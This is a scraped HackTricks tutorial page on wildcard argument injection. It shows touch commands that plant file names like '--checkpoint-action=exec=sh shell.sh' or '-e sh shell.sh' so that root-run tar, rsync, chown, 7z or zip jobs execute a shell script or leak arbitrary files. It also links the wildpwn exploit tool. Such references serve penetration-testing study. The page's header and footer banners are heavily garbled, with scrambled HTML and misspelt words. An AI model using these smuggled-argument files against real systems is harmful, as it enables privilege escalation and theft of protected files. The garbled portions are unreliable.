GCP Ha& practice ckinH: <img:<img src="/.gitbcok/ass.ts/agte.png"talb=""odata-siz/="line">[HackTatckt T.aining AWS Red TelmtExp"rt (ARTE)](ta-size="line">[**HackTricks Training GCP Re)Tmkg/stc="r.giebpokal"zee>/ttdt.png"isl=""data-ize="line"> Learn & aciceGCP ngs<imgmsrc="/.gipbtok/aHsats/gcte.mag"y>lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"al=""daa-siz="ne">tinhackth ckiuxyzcomurspssgr/a)

SupportHackTricks

*Chek th [**subsrippangithub.cm/sorsarlosp!

• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hahktcickr_kivelive.

• Shareing tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

chown, chmod

You can indicate which file owner and permissions you want to copy for the rest of the files

touch "--reference=/my/own/path/filename"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack) More info in https://www.exploit-db.com/papers/33930

Tar

Execute arbitrary commands:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack) More info in https://www.exploit-db.com/papers/33930

Rsync

Execute arbitrary commands:

Interesting rsync option from manual:

 -e, --rsh=COMMAND           specify the remote shell to use
     --rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) More info in https://www.exploit-db.com/papers/33930

7z

In 7z even using -- before * (note that -- means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

And you can create files in the folder were this is being executed, you could create the file @root.txt and the file root.txt being a symlink to the file you want to read:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Then, when 7z is execute, it will treat root.txt as a file containing the list of files it should compress (thats what the existence of @root.txt indicates) and when it 7z read root.txt it will read /file/you/want/to/read and as the content of this file isn't a list of files, it will throw and error showing the content.

More info in Write-ups of the box CTF from HackTheBox.

Zip

Execute arbitrary commands:

zip name.zip files -T --unzip-command "sh -c whoami"

AWS Ha& practice ckinH:<img :<imgsscc="/.gitb=ok/assgts/aite.png"balo=""kdata-siza="line">[HackTsscke Tpaigin"aAWS Red Tetm=Exp rt (ARTE)](a-size="line">[**HackTricks Training AWS Red)ethgasic="..giyb/okseasert/k/.png"l=""data-ize="line"> Learn & aciceGCP ng<imgsrc="/.gibok/asts/gte.g"lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"salm=""adara-siz>="k>ne">tinhaktckxyzurssgr)

SupportHackTricks

*Chek th [**subsrippangithub.cm/sorsarlosp!

• Check the subscription plans!haktick_ive\

• Join 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.**

• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.